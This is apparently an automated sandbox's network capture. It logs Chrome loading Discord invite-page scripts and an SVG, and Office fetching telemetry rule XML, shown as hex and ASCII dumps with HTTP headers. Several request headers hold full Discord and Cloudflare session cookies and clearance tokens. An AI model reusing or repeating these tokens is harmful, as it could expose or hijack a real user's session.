                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1369INData Raw: 2e 46 6f 72 6d 49 74 65 6d 2c 7b 74 69 74 6c 65 3a 75 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 75 2e 74 2e 48 5a 50 42 4f 54 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 63 2e 73 6d 73 49 6e 70 75 74 43 6f 6e 74 61 69 6e 65 72 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 6f 2e 54 65 78 74 49 6e 70 75 74 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 63 2e 73 6d 73 49 6e 70 75 74 2c 69 6e 70 75 74 52 65 66 3a 45 2c 6f 6e 43 68 61 6e 67 65 3a 5a 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 75 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 75 2e 74 2e 74 41 52 7a 67 6f 29 2c 6d 61 78 4c 65 6e 67 74 68 3a 31 30 2c 76 61 6c 75 65 3a 79 2c 61 75 74 6f 43 6f 6d 70 6c 65 74 65 3a 22 6f 6e 65 2d 74
                                                                                                                                                                                                                                                                                    Data Ascii: .FormItem,{title:u.intl.string(u.t.HZPBOT),children:[(0,l.jsxs)("div",{className:c.smsInputContainer,children:[(0,l.jsx)(o.TextInput,{className:c.smsInput,inputRef:E,onChange:Z,placeholder:u.intl.string(u.t.tARzgo),maxLength:10,value:y,autoComplete:"one-t
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1369INData Raw: 3e 7b 66 28 21 31 29 7d 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 6f 2e 5a 2e 53 6c 69 64 65 48 65 61 64 65 72 2c 7b 6f 6e 43 6c 6f 73 65 3a 75 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 6f 2e 5a 2e 53 6c 69 64 65 43 6f 6e 74 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 73 29 28 73 2e 46 6f 72 6d 49 74 65 6d 2c 7b 74 69 74 6c 65 3a 61 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 61 2e 74 2e 48 5a 50 42 4f 54 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 73 2e 54 65 78 74 49 6e 70 75 74 2c 7b 69 6e 70 75 74 52 65 66 3a 76 2c 6f 6e 43 68 61 6e 67 65 3a 78 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 61 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 61 2e 74 2e 74 41 52 7a 67 6f 29 2c 6d 61 78 4c 65 6e 67 74 68 3a
                                                                                                                                                                                                                                                                                    Data Ascii: >{f(!1)})},children:[(0,l.jsx)(o.Z.SlideHeader,{onClose:u}),(0,l.jsx)(o.Z.SlideContent,{children:(0,l.jsxs)(s.FormItem,{title:a.intl.string(a.t.HZPBOT),children:[(0,l.jsx)(s.TextInput,{inputRef:v,onChange:x,placeholder:a.intl.string(a.t.tARzgo),maxLength:
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1047INData Raw: 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 73 2e 42 75 74 74 6f 6e 2c 7b 73 75 62 6d 69 74 74 69 6e 67 3a 67 2c 6f 6e 43 6c 69 63 6b 3a 6a 2c 63 68 69 6c 64 72 65 6e 3a 68 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 68 2e 74 2e 58 72 33 45 6b 70 29 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 5a 2e 53 6c 69 64 65 45 72 72 6f 72 2c 7b 65 72 72 6f 72 3a 78 7d 29 5d 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 5a 2e 53 6c 69 64 65 46 6f 6f 74 65 72 2c 7b 6d 66 61 43 68 61 6c 6c 65 6e 67 65 3a 74 2c 73 65 74 53 6c 69 64 65 3a 66 7d 29 5d 7d 29 7d 7d 2c 36 35 38 35 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 47 7a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 50 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                                                                                                                                                                                                    Data Ascii: ren:[(0,l.jsx)(s.Button,{submitting:g,onClick:j,children:h.intl.string(h.t.Xr3Ekp)}),(0,l.jsx)(u.Z.SlideError,{error:x})]}),(0,l.jsx)(u.Z.SlideFooter,{mfaChallenge:t,setSlide:f})]})}},658550:function(e,t,n){n.d(t,{Gz:function(){return o},P0:function(){ret


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    113192.168.2.54983213.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:49 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:50 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201250Z-174c587ffdfmrvb9hC1TEBtn3800000003e0000000009nv9
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    114192.168.2.549839162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1324OUTGET /assets/05bd1eb5dea5ee3387f4.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC967INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:50 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 5601
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0ff9c4841ba-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "13ff42a071c43fa5521c11eb2f2ea914"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 15 Oct 2024 21:50:02 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLY%2F0%2FIOxKe64Lb8ICUh%2BB95ileNffo4t9KoAlaN9V7EYAH%2Bebfyjjfpcc9KF%2FFU4diRwQjyXsAzG5qZE7MSzz%2BWwEFSWY8AYCnqWSoL0A0HtRbX48FIvZdh0l4b"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC402INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 36 33 36 39 22 5d 2c 7b 34 33 38 38 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 61 3d 6e 28 34 34 32 38 33 37 29 2c 63 3d 6e 28 35 37 30 31 34 30 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["46369"],{438820:function(e,t,n){var i,a=n(442837),c=n(570140);function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1369INData Raw: 65 29 7b 6e 75 6c 6c 21 3d 65 26 26 28 73 3d 65 29 2c 73 2e 63 61 6e 50 6c 61 79 57 6f 77 4d 6f 6d 65 6e 74 3d 21 31 2c 73 2e 69 73 46 65 74 63 68 69 6e 67 57 6f 77 4d 6f 6d 65 6e 74 4d 65 64 69 61 3d 21 31 2c 73 2e 77 6f 77 4d 6f 6d 65 6e 74 57 75 6d 70 75 73 4d 65 64 69 61 55 72 6c 3d 6e 75 6c 6c 7d 67 65 74 53 74 61 74 65 28 29 7b 72 65 74 75 72 6e 20 73 7d 67 65 74 20 63 61 6e 50 6c 61 79 57 6f 77 4d 6f 6d 65 6e 74 28 29 7b 72 65 74 75 72 6e 20 73 2e 63 61 6e 50 6c 61 79 57 6f 77 4d 6f 6d 65 6e 74 7d 67 65 74 20 69 73 46 65 74 63 68 69 6e 67 57 6f 77 4d 6f 6d 65 6e 74 4d 65 64 69 61 28 29 7b 72 65 74 75 72 6e 20 73 2e 69 73 46 65 74 63 68 69 6e 67 57 6f 77 4d 6f 6d 65 6e 74 4d 65 64 69 61 7d 67 65 74 20 77 6f 77 4d 6f 6d 65 6e 74 57 75 6d 70 75 73 4d
                                                                                                                                                                                                                                                                                    Data Ascii: e){null!=e&&(s=e),s.canPlayWowMoment=!1,s.isFetchingWowMomentMedia=!1,s.wowMomentWumpusMediaUrl=null}getState(){return s}get canPlayWowMoment(){return s.canPlayWowMoment}get isFetchingWowMomentMedia(){return s.isFetchingWowMomentMedia}get wowMomentWumpusM
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1274INData Raw: 76 28 65 29 7b 74 72 79 7b 4d 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 55 52 43 48 41 53 45 44 5f 49 54 45 4d 53 5f 46 45 53 54 49 56 49 54 59 5f 49 53 5f 46 45 54 43 48 49 4e 47 5f 57 4f 57 5f 4d 4f 4d 45 4e 54 5f 4d 45 44 49 41 22 2c 76 61 6c 75 65 3a 21 30 7d 29 3b 6c 65 74 20 74 3d 65 3f 53 2e 5a 3a 62 2e 5a 3b 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 31 32 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 39 38 30 70 78 29 22 29 2e 6d 61 74 63 68 65 73 7c 7c 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 6d 69 6e 2d 68 65 69 67 68 74 3a 20 37 32 30 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 31 34 30 38 70 78 29 22 29 2e 6d 61 74
                                                                                                                                                                                                                                                                                    Data Ascii: v(e){try{M.Z.dispatch({type:"PURCHASED_ITEMS_FESTIVITY_IS_FETCHING_WOW_MOMENT_MEDIA",value:!0});let t=e?S.Z:b.Z;window.matchMedia("(min-width: 1012px) and (max-width: 1980px)").matches||window.matchMedia("(min-height: 720px) and (max-height: 1408px)").mat
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1369INData Raw: 55 4d 5f 57 4f 57 5f 4d 4f 4d 45 4e 54 5f 56 49 45 57 45 44 2c 7b 77 6f 77 5f 6d 6f 6d 65 6e 74 5f 74 79 70 65 3a 22 67 72 61 64 69 65 6e 74 5f 68 69 67 68 6c 69 67 68 74 22 7d 29 7d 2c 32 65 33 29 29 7d 72 65 74 75 72 6e 20 66 2e 53 2e 73 75 62 73 63 72 69 62 65 28 54 2e 43 6b 4c 2e 50 52 45 4d 49 55 4d 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 5f 43 52 45 41 54 45 44 2c 74 29 2c 28 29 3d 3e 7b 66 2e 53 2e 75 6e 73 75 62 73 63 72 69 62 65 28 54 2e 43 6b 4c 2e 50 52 45 4d 49 55 4d 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 5f 43 52 45 41 54 45 44 2c 74 29 7d 7d 2c 5b 65 2c 62 5d 29 3b 6c 65 74 5b 50 2c 79 5d 3d 73 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 5b 5a 2c 55 5d 3d 73 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 43 3d 28 30 2c 6d 2e 75 73 65 53 70 72 69 6e
                                                                                                                                                                                                                                                                                    Data Ascii: UM_WOW_MOMENT_VIEWED,{wow_moment_type:"gradient_highlight"})},2e3))}return f.S.subscribe(T.CkL.PREMIUM_SUBSCRIPTION_CREATED,t),()=>{f.S.unsubscribe(T.CkL.PREMIUM_SUBSCRIPTION_CREATED,t)}},[e,b]);let[P,y]=s.useState(!1),[Z,U]=s.useState(!1),C=(0,m.useSprin
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1187INData Raw: 36 39 30 2e 34 33 36 4c 34 33 33 2e 32 33 31 20 30 48 35 39 30 2e 37 36 39 4c 38 34 37 2e 39 37 35 20 31 30 32 34 5a 22 2c 66 69 6c 6c 3a 22 77 68 69 74 65 22 7d 29 5d 7d 29 7d 29 5d 7d 29 7d 7d 2c 33 30 34 34 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 2e 65 78 70 6f 72 74 73 3d 7b 77 72 61 70 70 65 72 3a 22 77 72 61 70 70 65 72 5f 63 64 32 32 65 37 22 2c 61 63 74 69 76 65 57 72 61 70 70 65 72 3a 22 61 63 74 69 76 65 57 72 61 70 70 65 72 5f 63 64 32 32 65 37 22 2c 76 69 64 65 6f 57 72 61 70 70 65 72 3a 22 76 69 64 65 6f 57 72 61 70 70 65 72 5f 63 64 32 32 65 37 22 2c 67 61 64 69 65 6e 74 48 69 67 68 6c 69 67 68 74 3a 22 67 61 64 69 65 6e 74 48 69 67 68 6c 69 67 68 74 5f 63 64 32 32 65 37 22 2c 73 77 69 70 65 57 72 61 70 70 65 72 3a 22 73
                                                                                                                                                                                                                                                                                    Data Ascii: 690.436L433.231 0H590.769L847.975 1024Z",fill:"white"})]})})]})}},304410:function(e,t,n){e.exports={wrapper:"wrapper_cd22e7",activeWrapper:"activeWrapper_cd22e7",videoWrapper:"videoWrapper_cd22e7",gadientHighlight:"gadientHighlight_cd22e7",swipeWrapper:"s


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    115192.168.2.549840162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1385OUTGET /assets/2597d11c1e039607373e.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:50 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 139
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0ffc8488c33-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "72a8b168ad2c7eea7b2559b5690c7695"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 05 Jun 2024 19:27:56 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fxGT3w3dzgDvv0HAvM%2B1jHII3VlJzWBUZ%2FK5SaTDM7JMl52qThv2SK%2BpJwME0pyU8bTHO166Og9VcwnGZnYZYcCr55R2ly0qRrdrd%2BZELZmm9B6Us0nTzxZQqRlF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC139INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 20 38 22 20 77 69 64 74 68 3d 22 38 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 22 20 63 79 3d 22 34 22 20 72 3d 22 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                                                                    Data Ascii: <svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    116192.168.2.54983713.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:50 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201250Z-178bfbc474bq2pr7hC1NYCkfgg000000050000000000g3ac
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
